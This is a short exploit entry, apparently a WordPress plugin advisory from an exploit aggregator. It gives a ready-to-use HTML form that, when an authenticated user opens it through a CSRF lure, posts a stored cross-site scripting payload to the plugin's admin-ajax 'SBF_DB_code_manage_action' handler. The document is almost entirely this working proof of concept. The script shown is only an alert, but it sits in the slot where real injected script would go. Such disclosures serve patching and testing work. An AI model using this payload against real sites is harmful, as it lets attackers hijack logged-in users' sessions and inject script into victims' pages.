## https://sploitus.com/exploit?id=WPEX-ID:7F43CB8E-0C1B-4528-8C5C-B81AB42778DC
Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack:

```html
<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="SBF_DB_code_manage_action">
    <input type="text" name="B_COMMAND" value="ADD">
    <input type="text" name="B_PARAM" value="10">
    <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
    <input type="text" name="B_PARAM3" value="1">
    <input type="submit" name="submit" value="submit">
</form>
```